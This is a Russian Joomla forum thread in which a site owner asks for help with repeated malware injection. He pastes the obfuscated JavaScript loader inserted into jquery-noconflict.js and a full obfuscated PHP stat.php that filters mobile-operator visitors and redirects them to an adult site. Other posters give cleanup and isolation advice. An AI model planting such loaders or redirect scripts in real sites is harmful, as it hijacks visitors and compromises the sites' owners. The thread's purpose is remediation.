0 Пользователей и 1 Гость просматривают эту тему.
  • 14 Ответов
  • 1206 Просмотров
*

harddrop

  • Осваиваюсь на форуме
  • 30
  • 0
  • Король Кролей
Вирус какимто образом записывается в фаил "jquery-noconflict.js"
www/media/jui/js/jquery-noconflict.js

Код
//k27NvFydHMaaxsw
t=0;tx='Code';tv='wri';while(t<106)document[tv+'te'](String['fromChar'+tx]('=tdsjqu!tsd>#iuuq;00uftu/blwbipmejoh/cj{0dpnqpofout0dpn`xsbqqfs0tubu/qiq#!uzqf>#ufyu0kbwbtdsjqu#?=0tdsjqu?'['char'+tx+'At'](t++)-1))
//hHKRt1vHRsGRpwcn

Не могу понять где искать
Joomla последняя
логи чистые (
недавно обновлял не помогло

*

vipiusss

  • Профи
  • 5594
  • 322
  • Круглая ава-зло!
Re: Joomla 3 вирус в файле jquery-noconflict.js
« Ответ #1 : 10.05.2015, 12:56:18 »
у вас к2 не стоит? в медиа папку есть доступ извне? права какие на папку и как у вас этот скрипт оказался?
Миграция, установка, обновление версий Joomla  |  Создание сайтов "под ключ"  |  Эксклюзивные заглушки "offline"  |  Работа с "напильником" над шаблонами и расширениями
*

harddrop

  • Осваиваюсь на форуме
  • 30
  • 0
  • Король Кролей
Re: Joomla 3 вирус в файле jquery-noconflict.js
« Ответ #2 : 10.05.2015, 13:16:20 »
K2 - никогда и не стоял
Права на папку 755
как этот скрипт туда попадает не знаю (
Видать какой то бот записывает
*

vipiusss

  • Профи
  • 5594
  • 322
  • Круглая ава-зло!
Re: Joomla 3 вирус в файле jquery-noconflict.js
« Ответ #4 : 10.05.2015, 13:21:49 »
удалите скрипт.
если вы считаете, что бот создаёт, узнайте по какой причине.
найдите бот и дайте ему п...ы.
я бы проверил папку темплейт и систем.
Миграция, установка, обновление версий Joomla  |  Создание сайтов "под ключ"  |  Эксклюзивные заглушки "offline"  |  Работа с "напильником" над шаблонами и расширениями
*

harddrop

  • Осваиваюсь на форуме
  • 30
  • 0
  • Король Кролей
Re: Joomla 3 вирус в файле jquery-noconflict.js
« Ответ #5 : 10.05.2015, 19:06:00 »
Сколько сайтов на хостинге? Версии Joomla какие? Какие были до обновления?

много сайтов но там где удалил он больше не появляется
*

vipiusss

  • Профи
  • 5594
  • 322
  • Круглая ава-зло!
Re: Joomla 3 вирус в файле jquery-noconflict.js
« Ответ #6 : 10.05.2015, 19:07:34 »
респект
Миграция, установка, обновление версий Joomla  |  Создание сайтов "под ключ"  |  Эксклюзивные заглушки "offline"  |  Работа с "напильником" над шаблонами и расширениями
*

harddrop

  • Осваиваюсь на форуме
  • 30
  • 0
  • Король Кролей
Re: Joomla 3 вирус в файле jquery-noconflict.js
« Ответ #7 : 10.05.2015, 19:08:07 »
удалите скрипт.
если вы считаете, что бот создаёт, узнайте по какой причине.
найдите бот и дайте ему п...ы.
я бы проверил папку темплейт и систем.

Как отследить бот если в логах ничего нет ?
*

vipiusss

  • Профи
  • 5594
  • 322
  • Круглая ава-зло!
Re: Joomla 3 вирус в файле jquery-noconflict.js
« Ответ #8 : 10.05.2015, 19:11:29 »
напишите хосту, узнайте, как в лог лезет.
или сделайте ваш код, которырый проверяет пути
Миграция, установка, обновление версий Joomla  |  Создание сайтов "под ключ"  |  Эксклюзивные заглушки "offline"  |  Работа с "напильником" над шаблонами и расширениями
*

harddrop

  • Осваиваюсь на форуме
  • 30
  • 0
  • Король Кролей
Re: Joomla 3 вирус в файле jquery-noconflict.js
« Ответ #9 : 18.05.2015, 16:53:09 »
Также на хостинге данного сайта замечен фаил stat.php
с кодом:
Код
<? $GLOBALS['_1847300369_']=Array('he' .'a' .'d' .'er','' .'json' .'_' .'decod' .'e','' .'erro' .'r_r' .'eporting','pre' .'g_' .'m' .'atch','stristr','tr' .'im','a' .'rray_shi' .'ft','explo' .'de','' .'stripos','s' .'ub' .'str','' .'pr' .'eg_m' .'at' .'ch','' .'preg_m' .'atc' .'h','pr' .'eg_match','strpos','e' .'xplode','strpo' .'s','str_re' .'place','ip' .'2lo' .'n' .'g','ip2long','ip2long','e' .'xp' .'l' .'ode','c' .'ou' .'nt','s' .'p' .'rin' .'tf','' .'ip2' .'long','ip' .'2long','' .'po' .'w','s' .'trpos','s' .'tr' .'_re' .'pl' .'a' .'c' .'e','str' .'_replac' .'e','strpos','explode','' .'s' .'prin' .'tf','i' .'p2' .'long','sprint' .'f','ip2' .'lo' .'ng','s' .'print' .'f','i' .'p2long','' .'preg_matc' .'h','' .'p' .'re' .'g_' .'m' .'at' .'ch','ba' .'sen' .'a' .'m' .'e','' .'fi' .'lemtim' .'e','file_g' .'et_c' .'o' .'nte' .'n' .'ts','file_put' .'_co' .'nten' .'ts','to' .'uc' .'h','' .'head' .'e' .'r','hea' .'der'); ?><? function _802019820($i){$a=Array("content-type: application/x-javascript",'[{"1":"194.54.148.8/32"},{"1":"195.74.84.32/32"},{"1":"213.87.112.0/23"},{"1":"213.87.114.0/23"},{"1":"213.87.118.0/23"},{"1":"213.87.120.0/22"},{"1":"213.87.124.0/24"},{"1":"213.87.125.0/24"},{"1":"213.87.128.0/20"},{"1":"213.87.240.0/22"},{"1":"213.87.54.0/23"},{"1":"213.87.6.8/32"},{"1":"213.87.65.5/32"},{"1":"213.87.65.6/32"},{"1":"213.87.74.0/24"},{"1":"213.87.76.0/24"},{"1":"213.87.77.0/24"},{"1":"213.87.8.0/21"},{"1":"213.87.80.0/21"},{"1":"213.87.94.0/23"},{"1":"217.66.145.15/32"},{"1":"217.66.145.16/32"},{"1":"217.66.146.0/24"},{"1":"217.66.147.0/24"},{"1":"217.66.148.0/22"},{"1":"217.66.152.0/24"},{"1":"217.66.156.0/24"},{"1":"217.66.157.0/24"},{"1":"217.66.158.0/24"},{"1":"217.66.159.0/24"},{"1":"217.74.244.128/25"},{"1":"217.74.244.13/32"},{"1":"217.74.245.0/24"},{"1":"217.74.247.128/25"},{"1":"217.74.248.0/22"},{"1":"217.74.252.0/23"},{"1":"217.8.226.0/23"},{"1":"217.8.228.0/22"},{"1":"217.8.232.0/23"},{"1":"217.8.234.0/24"},{"1":"217.8.235.194/32"},{"1":"217.8.236.11/32"},{"1":"217.8.238.0/24"},{"1":"217.8.239.0/24"},{"1":"80.83.224.0/25"},{"1":"80.83.228.0/22"},{"1":"80.83.232.0/23"},{"1":"80.83.237.0/25"},{"1":"80.83.238.0/25"},{"1":"80.83.238.246/32"},{"1":"80.83.239.0/25"},{"1":"84.17.224.252/32"},{"1":"84.17.254.0/23"},{"1":"95.153.160.0/19"},{"1":"95.153.250.0/23"},{"1":"95.153.252.0/22"},{"2":"83.149.8.0/23"},{"2":"83.149.21.0/24"},{"2":"85.26.164.0/23"},{"2":"83.149.25.0/24"},{"2":"83.149.52.0/22"},{"2":"78.25.92.0/24"},{"2":"78.25.93.0/24"},{"2":"85.26.227.0/24"},{"2":"85.26.228.0/24"},{"2":"85.26.229.0/24"},{"2":"85.26.230.0/24"},{"2":"46.229.140.0/24"},{"2":"46.229.141.0/24"},{"2":"83.149.44.0/23"},{"2":"83.149.46.0/23"},{"2":"78.25.120.0/22"},{"2":"193.201.231.2/32"},{"2":"46.229.132.0/24"},{"2":"46.229.133.0/24"},{"2":"46.229.134.0/24"},{"2":"78.25.88.0/22"},{"2":"83.149.1.192/30"},{"2":"83.149.1.196/30"},{"2":"83.149.1.200/29"},{"2":"83.149.2.0/23"},{"2":"83.149.24.64/26"},{"2":"83.149.34.128/25"},{"2":"83.149.35.0/24"},{"2":"83.149.36.0/25"},{"2":"83.149.36.128/25"},{"2":"83.149.38.0/24"},{"2":"83.149.43.128/25"},{"2":"83.149.48.0/25"},{"2":"85.26.155.0/24"},{"2":"85.26.183.0/24"},{"2":"85.26.184.0/24"},{"2":"85.26.186.0/24"},{"2":"85.26.192.0/24"},{"2":"85.26.193.0/24"},{"2":"85.26.194.0/24"},{"2":"85.26.195.0/24"},{"2":"85.26.224.0/26"},{"2":"85.26.231.0/25"},{"2":"85.26.232.0/23"},{"2":"85.26.234.0/23"},{"2":"85.26.241.0/24"},{"3":"217.168.176.0/24"},{"3":"217.168.176.18/32"},{"3":"217.168.179.0/24"},{"3":"217.168.184.0/24"},{"3":"217.168.185.0/24"},{"3":"217.168.186.0/24"},{"3":"217.168.187.0/24"},{"3":"217.168.188.0/24"},{"3":"217.168.189.0/24"},{"3":"217.168.190.0/24"},{"3":"217.168.191.0/24"},{"3":"5.191.0.0/16"},{"3":"5.44.32.0/21"},{"3":"176.28.80.0/21"},{"3":"77.244.112.0/20"},{"2":"83.149.49.0/27"},{"2":"85.26.231.128/27"},{"2":"83.149.48.128/28"},{"2":"83.149.48.160/28"},{"2":"83.149.49.209/32"},{"2":"83.149.49.212/32"},{"2":"78.25.94.0/24"},{"2":"78.25.95.0/24"},{"2":"37.29.86.0/24"},{"2":"37.29.87.0/24"},{"2":"83.149.0.228/32"},{"2":"83.149.28.0/24"},{"2":"83.149.36.0/24"},{"2":"83.149.37.0/24"},{"2":"83.149.52.10/32"},{"2":"37.28.187.0/24"},{"2":"37.28.185.0/24"},{"2":"185.3.34.0/23"},{"2":"185.3.32.0/23"},{"2":"83.149.44.0/22"},{"2":"83.149.41.0/24"},{"2":"83.149.24.252/32"},{"2":"83.149.24.251/32"},{"2":"83.149.24.249/32"},{"2":"46.229.142.128/25"},{"1":"213.87.54.0/24"},{"1":"213.87.55.0/24"},{"1":"213.87.72.73/32"},{"1":"213.87.80.0/20"},{"1":"213.87.94.0/24"},{"1":"213.87.95.0/24"},{"1":"217.66.146.0/26"},{"1":"217.66.148.0/24"},{"1":"217.66.149.0/24"},{"1":"217.66.150.0/24"},{"1":"217.66.151.0/24"},{"1":"217.66.155.0/24"},{"1":"217.74.246.0/23"},{"1":"217.8.228.0/23"},{"1":"217.8.230.0/23"},{"1":"95.153.192.0/20"},{"1":"95.153.208.0/21"},{"1":"95.153.244.0/22"},{"1":"95.153.248.0/21"},{"2":"85.26.191.128/25"},{"2":"85.26.189.0/24"},{"2":"85.26.185.0/24"},{"2":"85.26.184.0/25"},{"2":"85.26.179.0/24"},{"2":"85.26.177.0/24"},{"2":"85.26.176.0/24"},{"2":"83.169.252.0/22"},{"2":"46.232.202.0/23"},{"1":"213.87.248.0/22"},{"1":"213.87.104.0/23"},{"1":"213.87.100.0/22"},{"1":"213.87.96.0/23"},{"1":"213.87.116.0/23"},{"2":"83.149.52.40/29"},{"2":"83.149.52.36/30"},{"2":"83.149.52.34/31"},{"2":"83.149.1.208/29"},{"2":"46.229.142.0/24"},{"2":"185.3.32.0/22"},{"2":"37.29.48.0/21"},{"2":"37.29.88.0/24"},{"2":"46.29.192.0/21"},{"2":"83.149.19.0/24"},{"2":"37.29.96.0/20"},{"4":"85.115.248.0/24"},{"4":"85.115.243.32/27"},{"4":"85.115.224.9/32"},{"4":"85.115.224.128/27"},{"4":"85.115.224.10/32"},{"4":"83.220.227.0/24"},{"4":"62.33.151.0/24"},{"4":"46.16.96.0/21"},{"4":"217.118.93.0/24"},{"4":"217.118.92.0/24"},{"4":"217.118.91.64/26"},{"4":"217.118.90.0/24"},{"4":"217.118.89.0/24"},{"4":"217.118.85.64/28"},{"4":"217.118.85.0/24"},{"4":"217.118.83.0/24"},{"4":"217.118.82.64/26"},{"4":"217.118.82.32/28"},{"4":"217.118.82.16/28"},{"4":"217.118.81.0/24"},{"4":"217.118.80.0/24"},{"4":"217.118.79.0/24"},{"4":"217.118.78.0/24"},{"4":"217.118.66.0/24"},{"4":"217.118.64.32/28"},{"4":"217.118.64.32/27"},{"4":"85.115.234.0/23"},{"2":"37.29.40.0/24"},{"2":"37.29.41.0/24"},{"2":"37.29.118.0/24"},{"4":"83.220.236.0/22"},{"4":"217.118.95.0/24"},{"4":"217.148.194.128/28"},{"4":"31.13.144.0/26"},{"4":"85.115.224.11/32"},{"4":"85.115.224.12/32"},{"4":"85.115.224.13/32"},{"4":"85.115.224.14/32"},{"4":"85.115.224.192/26"},{"4":"217.118.82.128/25"},{"4":"217.118.85.64/32"},{"3":"5.153.30.100/32"}]','CLIENT_IP','FORWARDED','FORWARDED_FOR','FORWARDED_FOR_IP','HTTP_CLIENT_IP','HTTP_FORWARDED','HTTP_FORWARDED_FOR','HTTP_FORWARDED_FOR_IP','HTTP_PC_REMOTE_ADDR','HTTP_PROXY_CONNECTION','HTTP_VIA','HTTP_X_FORWARDED','HTTP_X_FORWARDED_FOR','HTTP_X_FORWARDED_FOR_IP','HTTP_X_IMFORWARDS','HTTP_XROXY_CONNECTION','VIA','X_FORWARDED','X_FORWARDED_FOR',"/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/",',',',',':',"/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/",'REMOTE_ADDR',"#([0-9]+\.).*#","10.","100.",'REMOTE_ADDR',"#([0-9]+\.[0-9]+\.).*#","192.168.",'REMOTE_ADDR','/','/','.','*','0','.','0',"%u.%u.%u.%u",'0','0','0','0','*','*','0','*','255','-','-',"%u","%u","%u",'HTTP_USER_AGENT',"#Windows NT|Macintosh|ipad|tablet#is","#Windows NT|Macintosh#is",'HTTP_UP',"PHP_SELF","HTTP_UP","r: ok","v: 10",'document.location.href = "http://4sexdream.ru";');return $a[$i];} ?><?php $GLOBALS['_1847300369_'][0](_802019820(0));$_0=$GLOBALS['_1847300369_'][1](_802019820(1),round(0+0.25+0.25+0.25+0.25));function l__0(){$_1=false;$GLOBALS['_1847300369_'][2](E_ERROR);$_2=array(_802019820(2),_802019820(3),_802019820(4),_802019820(5),_802019820(6),_802019820(7),_802019820(8),_802019820(9),_802019820(10),_802019820(11),_802019820(12),_802019820(13),_802019820(14),_802019820(15),_802019820(16),_802019820(17),_802019820(18),_802019820(19),_802019820(20));foreach($_2 as $_3){if($_1 !== false)continue;if(isset($_SERVER[$_3])&& $GLOBALS['_1847300369_'][3](_802019820(21),$_SERVER[$_3])){$_1=$_SERVER[$_3];continue;}else if($GLOBALS['_1847300369_'][4](_802019820(22),$_SERVER[$_3])!== FALSE){$_4=$GLOBALS['_1847300369_'][5]($GLOBALS['_1847300369_'][6]($GLOBALS['_1847300369_'][7](_802019820(23),$_SERVER[$_3])));if(($_5=$GLOBALS['_1847300369_'][8]($_4,_802019820(24)))!== FALSE)$_4=$GLOBALS['_1847300369_'][9]($_4,round(0),$_5);if($GLOBALS['_1847300369_'][10](_802019820(25),$_4)){$_1=$_SERVER[$_3];continue;}}}if($_1 === false){$_1=$_SERVER[_802019820(26)];}if($GLOBALS['_1847300369_'][11](_802019820(27),$_1,$_6)){if($_6[round(0+0.25+0.25+0.25+0.25)]== _802019820(28)|| $_6[round(0+0.5+0.5)]== _802019820(29)){$_1=$_SERVER[_802019820(30)];}}if($GLOBALS['_1847300369_'][12](_802019820(31),$_1,$_6)){if($_6[round(0+0.2+0.2+0.2+0.2+0.2)]== _802019820(32)){$_1=$_SERVER[_802019820(33)];}}return $_1;}function l__1($_7,$_8){if($GLOBALS['_1847300369_'][13]($_8,_802019820(34))!== false){list($_8,$_9)=$GLOBALS['_1847300369_'][14](_802019820(35),$_8,round(0+0.4+0.4+0.4+0.4+0.4));if($GLOBALS['_1847300369_'][15]($_9,_802019820(36))!== false){$_9=$GLOBALS['_1847300369_'][16](_802019820(37),_802019820(38),$_9);$_10=$GLOBALS['_1847300369_'][17]($_9);return(($GLOBALS['_1847300369_'][18]($_7)&$_10)==($GLOBALS['_1847300369_'][19]($_8)&$_10));}else{$_11=$GLOBALS['_1847300369_'][20](_802019820(39),$_8);while($GLOBALS['_1847300369_'][21]($_11)<round(0+1+1+1+1))$_11[]=_802019820(40);list($_12,$_13,$_14,$_15)=$_11;$_8=$GLOBALS['_1847300369_'][22](_802019820(41),empty($_12)?_802019820(42):$_12,empty($_13)?_802019820(43):$_13,empty($_14)?_802019820(44):$_14,empty($_15)?_802019820(45):$_15);$_16=$GLOBALS['_1847300369_'][23]($_8);$_17=$GLOBALS['_1847300369_'][24]($_7);$_18=$GLOBALS['_1847300369_'][25](round(0+0.5+0.5+0.5+0.5),(round(0+16+16)-$_9))-round(0+1);$_10=~$_18;return(($_17&$_10)==($_16&$_10));}}else{if($GLOBALS['_1847300369_'][26]($_8,_802019820(46))!==false){$_19=$GLOBALS['_1847300369_'][27](_802019820(47),_802019820(48),$_8);$_20=$GLOBALS['_1847300369_'][28](_802019820(49),_802019820(50),$_8);$_8="$_19-$_20";}if($GLOBALS['_1847300369_'][29]($_8,_802019820(51))!==false){list($_19,$_20)=$GLOBALS['_1847300369_'][30](_802019820(52),$_8,round(0+0.4+0.4+0.4+0.4+0.4));$_21=(float)$GLOBALS['_1847300369_'][31](_802019820(53),$GLOBALS['_1847300369_'][32]($_19));$_22=(float)$GLOBALS['_1847300369_'][33](_802019820(54),$GLOBALS['_1847300369_'][34]($_20));$_17=(float)$GLOBALS['_1847300369_'][35](_802019820(55),$GLOBALS['_1847300369_'][36]($_7));return(($_17>=$_21)&&($_17<=$_22));}return false;}}function l__2(){global $_0;$_23=l__0();$_24=$_SERVER[_802019820(56)];foreach($_0 as $_25){foreach($_25 as $_26=>$_27){if(l__1($_23,$_27)){if($_26 == round(0+2+2)|| $_26 == round(0+0.25+0.25+0.25+0.25)){if(l__3($_24,$_26)){return false;}}return true;}}}return false;}function l__3($_24,$_28){if($GLOBALS['_1847300369_'][37](_802019820(57),$_24)&& $_28 == round(0+0.8+0.8+0.8+0.8+0.8)){return true;}else if($GLOBALS['_1847300369_'][38](_802019820(58),$_24)&& $_28 == round(0+1)){return true;}return false;}if(isset($_SERVER[_802019820(59)])){$_29=$GLOBALS['_1847300369_'][39]($_SERVER[_802019820(60)]);$_30=$GLOBALS['_1847300369_'][40]($_29);if($_31=$GLOBALS['_1847300369_'][41]($_SERVER[_802019820(61)])){$GLOBALS['_1847300369_'][42]($_29,$_31);};$GLOBALS['_1847300369_'][43]($_29,$_30);$GLOBALS['_1847300369_'][44](_802019820(62));exit();}$GLOBALS['_1847300369_'][45](_802019820(63));if(l__2()){echo _802019820(64);}
*

flyingspook

  • Moderator
  • 3619
  • 236
Re: Joomla 3 вирус в файле jquery-noconflict.js
« Ответ #10 : 18.05.2015, 22:20:24 »
много сайтов но там где удалил он больше не появляется
Вам сайты надо разграничивать если у вас шарада хост и нет возможности разделения по пользователям сайтов, то вам переезжать надо на vps/vds.
А искать уже поздно, требуется чистить и обновлять все сайты сколько у вас есть.
*

x1

  • Давно я тут
  • 372
  • 14
Re: Joomla 3 вирус в файле jquery-noconflict.js
« Ответ #12 : 26.05.2015, 22:51:49 »
А искать уже поздно
Я бы не был так категоричен. Я пользуюсь для контроля таким способом - держу копию сайта на Денвере и если что - просто сравниваю содержимое файлов с помощью Beyond Compare. Вредоносный код отслеживается сразу: в файлах, скриптах и в дампах базы. Конечно на уязвимость - как это лезет - ответа не даст.
*

flyingspook

  • Moderator
  • 3619
  • 236
Re: Joomla 3 вирус в файле jquery-noconflict.js
« Ответ #13 : 27.05.2015, 08:58:17 »
Я бы не был так категоричен. Я пользуюсь для контроля таким способом - держу копию сайта на Денвере и если что - просто сравниваю содержимое файлов с помощью Beyond Compare. Вредоносный код отслеживается сразу: в файлах, скриптах и в дампах базы. Конечно на уязвимость - как это лезет - ответа не даст.
Есть выражение
- Поздно пить боржоми когда почки отказали
Надо стараться предотвращать, полностью не получится, но пытаться изначально все сделать и минимизировать риски.
По поводу
Цитировать
А искать уже поздно
Надо изначально устранять вредоносный код, обновлять все что возможно, настраивать разграничения разделяя сайты и потом смотреть логи на счет проникновения и прочего.
*

winstrool

  • Завсегдатай
  • 770
  • 41
  • Свободен для работы
Re: Joomla 3 вирус в файле jquery-noconflict.js
« Ответ #14 : 29.05.2015, 23:20:33 »
K2 - никогда и не стоял
Права на папку 755
как этот скрипт туда попадает не знаю (
Видать какой то бот записывает
Как отследить бот если в логах ничего нет ?
Посмотрите на дату создания и на дату изменения файлов, затем в логах просмотрите ИП совпадения по обращению к другим файлом(если бот, то полюбому чекал на валидность), по идее требуется большой комплекс работ, по устранению вашей проблемы и влетит в копеечку..., ну и естественно прийдется на всех сайтах менять пароли..., там только Joomla присутствует или еще сайты на других CMS?
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

опять вирус \?

Автор mami_

Ответов: 15
Просмотров: 170
Последний ответ 07.09.2017, 06:20:29
от voland
Как исправить уязвимость в Joomla 1.5.26 - libraries/phpmailer/phpmailer.php - RCE : CVE-2016-10045,?

Автор Elimelech

Ответов: 4
Просмотров: 488
Последний ответ 03.09.2017, 16:24:17
от Sorbon
Вирус, который виден только в кэше поисковых систем

Автор silavoli

Ответов: 12
Просмотров: 1161
Последний ответ 19.07.2017, 09:57:20
от flyingspook
Поймали вирус trojan.inject.21 как лечить

Автор nick2202

Ответов: 3
Просмотров: 392
Последний ответ 14.07.2017, 17:31:00
от voland
Вирус в виде рекламы на сайте

Автор yasna

Ответов: 10
Просмотров: 298
Последний ответ 08.06.2017, 18:38:43
от winstrool